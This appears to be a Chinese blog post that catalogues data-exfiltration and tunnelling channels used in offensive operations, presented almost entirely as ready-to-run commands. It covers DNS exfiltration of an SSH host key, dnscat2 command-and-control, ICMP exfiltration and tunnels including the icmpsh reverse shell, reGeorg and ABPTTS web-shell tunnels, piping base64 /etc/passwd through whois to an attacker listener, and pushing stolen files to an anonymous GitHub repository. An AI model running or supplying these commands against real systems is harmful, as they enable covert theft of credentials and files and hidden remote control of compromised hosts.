【文末送书】攻防之数据回传通道总结

1
2
3
4
5
6

python2：
python -m SimpleHTTPServer
python3:
python -m http.server
php:
php -S 0.0.0.0:8888

1
2

service vsftpd start
访问ip:21

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

cd /etc/samba
vi smb.conf
文件内添加:
[share]
    path =/home/share
    available = yes
    browsealbe = yes
    public= no
    writable = yes
cd /home
mkdir share
chmod -R 777 share
useradd share
smbpasswd -a share
service smbd restart
访问\ip

1

scp localfilename [email protected]:filename

1

for i in $(xxd -p -c 10 ssh_host_ecdsa_key);do sleep 1s && nslookup $i.xxx.com xx.xx.xx.xx;done

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

攻击机（server）：
安装
apt-get install ruby ruby-dev git make g++ rubygems
gem update --system
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
设置一个NS记录指向自己的子域名，再设置一个A记录指向自己部署server端的服务器地址，运行
ruby ./dnscat2.rb dns.uuzdaisuki.com --no-cache

受害者（linux）安装
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
受害者（windows）安装
https://downloads.skullsecurity.org/dnscat2/ 下载win32.zip的dnascat2后解压

将server中产生的secret复制下来，运行
./dnscat --dns domain=dns.uuzdaisuki.com --secret=xxxxxxxxxxxxxxxxxxxxx
session -i 1

1

cat a.txt | xxd -p -c 1|xargs -n 1 -I '{}' ping -c 1 -s 56 -p '{}' xx.xx.xx.xx

1
2
3
4
5
6
7

http://www.cs.uit.no/~daniels/PingTunnel/
ptunnel -p 192.168.100.232 -lp 8888 -da 192.168.118.131 -dp 3389
    -p 指定ICMP隧道另一端的IP
    -lp：指定本地监听的端口
    -da：指定要转发的目标机器的IP
    -dp：指定要转发的目标机器的端口
    -x：指定连接密码

1
2
3
4
5
6
7
8
9

攻击者机器部署icmpsh：
git clone https://github.com/inquisb/icmpsh.git
sysctl -w net.ipv4.icmp_echo_ignore_all=1
cd icmpsh
syntax: ./icmpsh_m.py <attacker’s-IP> <target-IP>
./icmpsh_m.py 192.168.1.108 192.168.1.106
受害者机器：
syntax: icmpsh.exe -t <Kali IP>
icmpsh.exe -t 192.168.1.108

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

受害者主机：
安装icmptunnel
git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel
make
禁用ICMP echo回复
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
服务端模式启动icmptunnel，并且给新的隧道接口分配一个IP地址
./icmptunnel -s
Ctrlz
bg
/sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0
ifconfig

攻击者主机：
安装icmptunnel
git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel
make
禁用ICMP echo回复
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
运行
./icmptunnel 192.168.1.108
ctrl z
/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0

1
2
3
4
5
6
7

git clone https://github.com/sensepost/reGeorg.git
pip install urllib3
将对应页面上传到目标服务器上
并在本地监听
python reGeorgSocksProxy.py ‐p 8080 ‐l 192.168.1.5 ‐u 
访问目标
http://192.168.1.119/tunnel.aspx

1
2
3
4
5
6
7
8
9
10
11

安装
apt-get install python-dev  build-essential libssl-dev libffi-dev  libxml2-dev libxslt1-dev zlib1g-dev python-pip
 pip install pycrypto
git clone https://github.com/nccgroup/ABPTTS.git
cd ABPTTS/
生成payload
python abpttsfactory.py ‐o webshell
传到目标靶机
端口转发
python abpttsclient.py ‐c webshell/config.txt ‐u "http://192.168.1.119/abptts.aspx" ‐f 192.168.1.5:33389/192.168.1.119:3389
让攻击机的33389端口流量转发到3389，通过HTTPS服务

1
2
3
4

失陷机：
root@kali:~# whois -h x.x.x.x -p 4444 `cat /etc/passwd | base64`
接受机：
root@kali:/tmp# nc -l -v -p 4444 | sed ""s/ //g"" | base64 -d

1
2
3
4
5
6
7
8
9
10

通过一个匿名邮箱注册github账户，并创建一个空仓库
mdkir upload
cd upload
git config --global user.name “user.name”
git config --global user.email “user.email”
git clone https://github.com/xxx/xxx.git
cp -r file upload
git add *
git commit -m "update"
git push -u origin master